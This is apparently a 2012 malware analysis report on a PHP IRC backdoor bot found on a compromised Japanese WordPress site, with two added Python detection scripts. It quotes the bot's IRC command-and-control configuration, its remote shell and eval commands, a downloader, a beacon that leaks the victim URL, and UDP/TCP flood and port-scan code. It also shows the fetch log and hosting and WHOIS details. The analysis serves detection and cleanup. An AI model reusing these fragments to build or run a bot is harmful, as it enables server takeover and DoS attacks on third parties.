- ==============================
- Operation Cleanup Japan
- report: #OCJP-040
- Base: http://unixfreaxjp.blogspot.jp/2012/05/ocjp-040.html
- VT: https://www.virustotal.com/file/530d50212bf404cf82a40532ec90f90ea9a6533e3d38a233f8d34c15d10a0e8c/analysis/1335907672/
- ==============================
- This is the PHP IRC/bot malware found on a Japanese IDC server via a vulnerable WordPress theme plugin.
- It is currently under investigation as #OCJP case OCJP-040.
- Below is the proof of the object's malicious activities:
- ==================
- IRC base Bot:
- ==================
- var $config = array("server"=>"irc.s4l1ty.info",
- "port"=>6667,
- "pass"=>"zero",
- "prefix"=>"ZERO",
- "maxrand"=>8,
- "chan"=>"#zero",
- "key"=>"",
- "modes"=>"+iB-x",
- "password"=>"zero",
- "trigger"=>".",
- "hostauth"=>"*" // * for any hostname
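- The configuration above makes the bot hold a persistent outbound TCP connection from the web server to an IRC server on port 6667. A host-side check for that pattern, as an added example that is not part of the OCJP-040 report or of the bot's code: it parses `ss -tnp` output and flags established connections to IRC ports that are owned by web-server processes. The sample output (RFC 5737 documentation addresses), the port list and the process names are constructed assumptions.

```python
"""Flag outbound IRC connections held by web-server processes.
Added example, not from the OCJP-040 report; input format is `ss -tnp`."""
import re
import sys
from dataclasses import dataclass

# Constructed sample of `ss -tnp` output (not captured from the infected host).
SAMPLE_SS = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 10.0.0.5:51234 192.0.2.10:6667 users:(("php-fpm",pid=1234,fd=12))
ESTAB 0 0 10.0.0.5:443 198.51.100.7:52311 users:(("apache2",pid=1200,fd=9))
ESTAB 0 0 10.0.0.5:40000 192.0.2.20:6667 users:(("irssi",pid=999,fd=5))
ESTAB 0 0 10.0.0.5:51300 192.0.2.30:443 users:(("php-fpm",pid=1234,fd=13))
"""

# Assumed port and process lists; extend to match the local environment.
IRC_PORTS = set(range(6660, 6670)) | {6697, 7000}
WEB_PROCS = {"php-fpm", "php", "php-cgi", "lsphp", "apache2", "httpd", "nginx"}

# State, Recv-Q, Send-Q, local, peer, optional process annotation.
LINE_RE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)'
    r'(?:\s+users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+))?'
)


@dataclass(frozen=True)
class Finding:
    proc: str
    pid: int
    peer_ip: str
    peer_port: int


def split_hostport(addr):
    """Split 'host:port' (also '[v6]:port') on the last colon."""
    host, _, port = addr.rpartition(":")
    return host, int(port)


def find_irc_from_web(ss_output):
    """Return Findings for ESTAB sockets to an IRC port owned by a web process."""
    findings = []
    for line in ss_output.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("state") != "ESTAB" or not m.group("proc"):
            continue  # header, non-established, or no process info (run as root for -p)
        ip, port = split_hostport(m.group("peer"))
        if port in IRC_PORTS and m.group("proc") in WEB_PROCS:
            findings.append(Finding(m.group("proc"), int(m.group("pid")), ip, port))
    return findings


if __name__ == "__main__":
    # Pipe real output in with `ss -tnp | python3 this.py`; otherwise use the sample.
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_SS
    for f in find_irc_from_web(data):
        print(f"ALERT {f.proc}[{f.pid}] -> {f.peer_ip}:{f.peer_port}")
```

- A web server has no business keeping a long-lived socket to an IRC port; the legitimate IRC client (irssi) in the sample is deliberately not flagged, so the check stays specific to the web-shell-turned-bot case the report describes.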
- ==================
- DNS Lookup
- ==================
- config.inc.txt(15): * .dns <IP|HOST> //dns lookup
- config.inc.txt(206): case "dns":
- config.inc.txt(212): $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
- config.inc.txt(216): $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
- ==================
- SERVER REMOTE EXECUTION
- ==================
- Designed to execute shell commands on the Unix or Windows host, whichever has PHP installed:
- * .sexec <cmd> // uses shell_exec() //execute a command
- * .exec <cmd> // uses exec() //execute a command
- * .cmd <cmd> // uses popen() //execute a command
- * .php <php code> // uses eval() //execute php code
- ==================
- DOWNLOADER
- ==================
- Download interface onto the compromised system:
- * .download <URL> <filename> //download a file
- else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
- ==================
- HACKER GROUP ATTACK TOOLS
- ==================
- These tools belong to the following hacker group:
- #crew@corp. since 2003
- edited by: devil__ and MEIAFASE <admin@xdevil.org> <meiafase@pucorp.org>
- Friend: LP <fuckerboy@sercret.gov>
- ==================
- INFECTION NOTIFICATION
- ==================
- Reports the infection of the vulnerable machine to the IRC channel:
- $this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
- $this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
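- The IRC configuration, the remote-execution commands, the downloader and the infection notification above are all textual indicators that survive in the dropped file. A static scan for them across a web content tree, as an added example that is not part of the OCJP-040 report or of the malware: the indicator patterns mirror the snippets quoted in this report, while the weights, the threshold, the file-extension list and both sample sources are this example's own assumptions (the samples are a few constructed lines shaped like the excerpts, not the bot).

```python
"""Static indicator scan for pbot-style PHP IRC bots under a web content directory.
Added example, not from the OCJP-040 report; weights and threshold are assumptions."""
import os
import re
import sys
from dataclasses import dataclass

# (name, pattern, weight). Each indicator counts once per file regardless of repeats.
INDICATORS = [
    ("irc_config_keys", re.compile(r'"(server|chan|trigger|hostauth|prefix)"\s*=>'), 2),
    ("irc_privmsg", re.compile(r'->privmsg\s*\('), 2),
    ("irc_port", re.compile(r'"port"\s*=>\s*6667'), 1),
    ("shell_exec", re.compile(r'\bshell_exec\s*\('), 3),
    ("exec", re.compile(r'\bexec\s*\('), 2),
    ("popen", re.compile(r'\bpopen\s*\('), 2),
    ("eval", re.compile(r'\beval\s*\('), 3),
    ("udp_socket", re.compile(r'fsockopen\s*\(\s*"udp://'), 3),
    ("fsockopen", re.compile(r'\bfsockopen\s*\('), 1),
    ("mail", re.compile(r'\bmail\s*\('), 1),
    ("leaks_request_uri", re.compile(r"\$_SERVER\['REQUEST_URI'\]"), 1),
]
THRESHOLD = 6  # assumption: a lone mail() or fsockopen() in a theme must not alert

# The report's sample hid as config.inc.txt, so .txt and .inc are scanned on purpose.
SCAN_EXTS = {".php", ".phtml", ".inc", ".txt"}


@dataclass
class ScanResult:
    hits: list
    score: int


def scan_source(text):
    """Score one file's contents against the indicator table."""
    hits = [name for name, pat, _ in INDICATORS if pat.search(text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return ScanResult(hits, score)


def is_suspicious(text, threshold=THRESHOLD):
    return scan_source(text).score >= threshold


def scan_directory(root, threshold=THRESHOLD):
    """Yield (path, ScanResult) for files under root that reach the threshold."""
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if os.path.splitext(fn)[1].lower() not in SCAN_EXTS:
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    result = scan_source(fh.read())
            except OSError:
                continue  # unreadable file; skip rather than abort the sweep
            if result.score >= threshold:
                yield path, result


# Constructed sample shaped like the report's excerpts (not the malware itself).
SAMPLE_BOT = r'''<?php
var $config = array("server"=>"irc.example.invalid","port"=>6667,"chan"=>"#zero","trigger"=>".","hostauth"=>"*");
$this->privmsg($this->config['chan'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);
$out = shell_exec($mcmd[1]);
eval($mcmd[1]);
'''

# Constructed benign sample: a theme helper that only sends mail.
SAMPLE_BENIGN = r'''<?php
function notify_owner($subject, $body) {
    return mail(get_option('admin_email'), $subject, $body);
}
'''

if __name__ == "__main__":
    for label, src in (("bot-like", SAMPLE_BOT), ("benign", SAMPLE_BENIGN)):
        r = scan_source(src)
        print(f"{label}: score={r.score} hits={r.hits} suspicious={is_suspicious(src)}")
    if len(sys.argv) > 1:  # e.g. python3 this.py /var/www/html/wp-content
        for path, r in scan_directory(sys.argv[1]):
            print(f"{path}: score={r.score} hits={r.hits}")
```

- The weighting matters more than any single pattern: `mail()` and `fsockopen()` are common in legitimate themes, so they only contribute alongside the IRC-specific keys, `privmsg` calls, or `eval`/`shell_exec`. Scanning `.txt` files is the point the report makes implicitly: the dropper lived as `config.inc.txt`, which a scanner limited to `.php` would never open.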
- ==================
- DoS / DDoS ATTACK TOOLS
- ==================
- Three attack functions:
- TCP FLOOD
- -----------
- * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
- case "tcpflood":
- if(count($mcmd)>5)
- {$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);}
- function tcpflood($host,$packets,$packetsize,$port,$delay)
- {$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
- $packet = "";
- for($i=0;$i<$packetsize;$i++)
- UDP FLOOD
- -----------
- * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
- function udpflood($host,$packetsize,$time) {
- $this->privmsg($this->config['chan'],"[\2Attack Iniciado com sucesso!\2]");
- $packet = "";
- for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
- $timei = time();$i = 0;
- while(time()-$timei < $time) {
- $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
- fwrite($fp,$packet);fclose($fp);$i++;
- PORT SCANNING
- -----------
- * .pscan <host> <port> //port scan
- case "pscan": // .pscan 6667
- if(count($mcmd) > 2)
- { if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
- $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
- else
- $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
- ==================
- Portuguese is used throughout:
- ==================
- Impossivel mandar e-mail.");
- ensagem enviada para \2"
- Nao foi possivel fazer o download. Permissao negada.
- ==================
- SPYWARE
- ==================
- Can send e-mail messages, triggered via IRC, that carry the infected system's credentials; can also be used for spamming:
- if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \n
- {$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");}
- else {$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");}
- $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
- $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
- ================================
- MALWARE SOURCE
- ================================
- --14:34:56-- http://happymeme.com/uzumaki//wp-content/themes/autofocus/config.inc.txt
- => `config.inc.txt'
- Resolving happymeme.com... 112.78.112.187
- Connecting to happymeme.com|112.78.112.187|:80... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 23,375 (23K) [text/plain]
- 100%[====================================>] 23,375 81.18K/s
- 14:34:59 (80.91 KB/s) - `config.inc.txt' saved [23375/23375]
- ================================
- VIRUS TOTAL
- ================================
- https://www.virustotal.com/file/530d50212bf404cf82a40532ec90f90ea9a6533e3d38a233f8d34c15d10a0e8c/analysis/1335907672/
- nProtect : Trojan.Dropper.RYF
- K7AntiVirus : Backdoor
- VirusBuster : PHP.Shellbot.J
- F-Prot : PHP/Pbot.B
- Symantec : PHP.Backdoor.Trojan
- Norman : PHP/Ircbot.BBPH
- TrendMicro-HouseCall : BKDR_PHPBOT.SM
- Avast : PHP:IRCBot-AB [Trj]
- ClamAV : PHP.Bot
- Kaspersky : Backdoor.PHP.Pbot.a
- BitDefender : Trojan.Dropper.RYF
- Sophos : Troj/PHPBot-F
- Comodo : Backdoor.PHP.Pbot.A
- F-Secure : Trojan.Dropper.RYF
- DrWeb : PHP.BackDoor.14
- VIPRE : Backdoor.PHP.Pbot.b (v) (not malicious)
- AntiVir : PHP/PBot.A.6
- TrendMicro : BKDR_PHPBOT.SM
- McAfee-GW-Edition : Heuristic.BehavesLike.JS.Suspicious.G
- Emsisoft : Backdoor.PHP.Pbot!IK
- eTrust-Vet : PHP/Pbot.D
- Jiangmin : Trojan/Script.Gen
- Microsoft : Trojan:PHP/Flader.A
- GData : Trojan.Dropper.RYF
- Commtouch : PHP/Pbot.B
- AhnLab-V3 : PHP/Pbot
- VBA32 : Backdoor.PHP.Pbot.a
- PCTools : Malware.PHP-Backdoor
- Rising : Trojan.Script.HTML.Agent.ab
- Ikarus : Backdoor.PHP.Pbot
- Fortinet : PHP/Pbot.AK!tr.bdr
- AVG : PHP/BackDoor.K
- Panda : Bck/Pbot.B
- ================================
- NETWORK SOURCE
- ================================
- Routing (AS)
- -----------
- IP: 112.78.112.187
- inetnum: 112.78.112.0 - 112.78.112.255
- netname: SAKURA-NET
- descr: SAKURA Internet Inc.
- country: JP
- admin-c: KT749JP
- tech-c: KW419JP
- remarks: This information has been partially mirrored by APNIC from
- remarks: JPNIC. To obtain more specific information, please use the
- remarks: JPNIC WHOIS Gateway at
- remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or
- remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client
- remarks: defaults to Japanese output, use the /e switch for English
- remarks: output)
- changed: apnic-ftp@nic.ad.jp 20090303
- changed: apnic-ftp@nic.ad.jp 20090331
- source: JPNIC
- 112.78.112.0/20
- SAKURA-C (4/OSAKA) SAKURA Internet // WEST JAPAN BACKBONE
- 1-8-15 Kyutaro-cho, Chuo Osaka 541-0056, Japan
- AS9371
- SAKURA-C SAKURA Internet // WEST JAPAN BACKBONE
- Sakaisuji Honmachi Bldg. 9F 1-8-14 Minami-Honmachi,
- Chuo-ku Osaka 541-0054, Japan
- Domain
- -----------
- Domain Name: happymeme.com
- Created On: 2007-02-25 13:40:54.0
- Last Updated On: 2012-02-27 21:37:36.0
- Expiration Date: 2013-02-25 04:40:54.0
- Status: ACTIVE
- Registrant Name: Whois Privacy Protection Service
- Registrant Organization: paperboy and co.
- Registrant Street1: 2-7-21 Tenjin Chuo-ku
- Registrant Street2: Tenjin Prime 8F
- Registrant City: Fukuoka-shi
- Registrant State: Fukuoka
- Registrant Postal Code: 8100001
- Registrant Country: JP
- Registrant Phone: 81-927137999
- Registrant Fax: 81-927137944
- Tech Email: privacy@whoisprivacyprotection.info
- Name Server: ns1.dns.ne.jp
- Name Server: ns2.dns.ne.jp
- --------------------------------------------------
- Host names whose A records share this IP are exposed to the same
- risk under the current findings (112 items)
- --------------------------------------------------
- 194964s.com
- 2103kakaku.com
- aeru21.com
- aeruzo.com
- aeruzo.net
- aitaiyoo.com
- aitaizo.com
- aitaizo.net
- anzen-shisan.com
- anzen-toushi.com
- b-jays.net
- biyo-neosta.com
- boku-uma.com
- cafebuono.net
- carnavi-neosta.com
- chanel-neosta.com
- chusho-ma.biz
- cosmo-support.com
- cucina-style.com
- cutie-eggs.com
- daftbrain.com
- dankai-club.com
- daveswebworks.com
- draxn.net
- drbeverlynelson.com
- earthworks1.com
- ed3s.net
- enyasuita.com
- extank.com
- fukuirin.com
- fx-toushi.biz
- gaika-yokin.org
- gakushi110.com
- gan-kenko.com
- gooddieter.org
- gucci-neosta.com
- hajikunshop.com
- happyguide.biz
- happyguide.info
- happymailz.com
- happymailz.net
- happymeme.com
- hlj93.com
- hpmls.net
- ichikawayuu.com
- iheya-genkimura.org
- iirufa.com
- japangoodsplaza.com
- jewelry-neosta.com
- ji-joutatsu.com
- kanakana-piano.com
- kineyakatsuroku.com
- koi-iro.com
- kojimatsubasa.com
- koshunyujob.com
- kotaninene.com
- kounojimusyo.com
- loaddarthtrader.com
- lumiere4.com
- luxy-party.com
- m2051.com
- macj-log.com
- mail.nagasaka-web.net
- mail.s-smile.net
- marujyohome.com
- mild7-1.net
- morigen.info
- morita29.com
- nagasaka-web.net
- newsharaku.com
- nibo6.com
- nitoroy.com
- npo-bsk.com
- npo-hima.net
- okamotoann.com
- onyanco.com
- oonoyohei.com
- oota-amaharashi.jp
- ozakikana.com
- penki-nurikae.com
- potyari.biz
- recorder-neosta.com
- redrox.net
- reiki-a.com
- reiki-dream.net
- rightsangyou.com
- ryuzo-nakata.com
- s-smile.net
- sakaidaiki.com
- sankei-inc.com
- sekengaku.org
- sekiaya.com
- sheadream.com
- shibataindustries.com
- shimadadaiki.com
- shisan-unyou.info
- smileagefan.com
- t-zei.jp
- ton-kichi.net
- toushi-fx.net
- uchiyamahinata.com
- www.h-sketch.com
- www.oota-amaharashi.jp
- www.penki-nurikae.com
- www.t-zei.jp
- xn--torr3dy20axh7a.com (.com)
- yamacho-club.com
- yen-energy.com
- yoke-kichijoji.com
- yokohamahikari.com
- yosapark-saribaba.com
- yurai-seitai.net
- ------
- ZeroDay Japan http://0day.jp
- OPERATION CLEANUP JAPAN | #OCJP
- Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
- sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com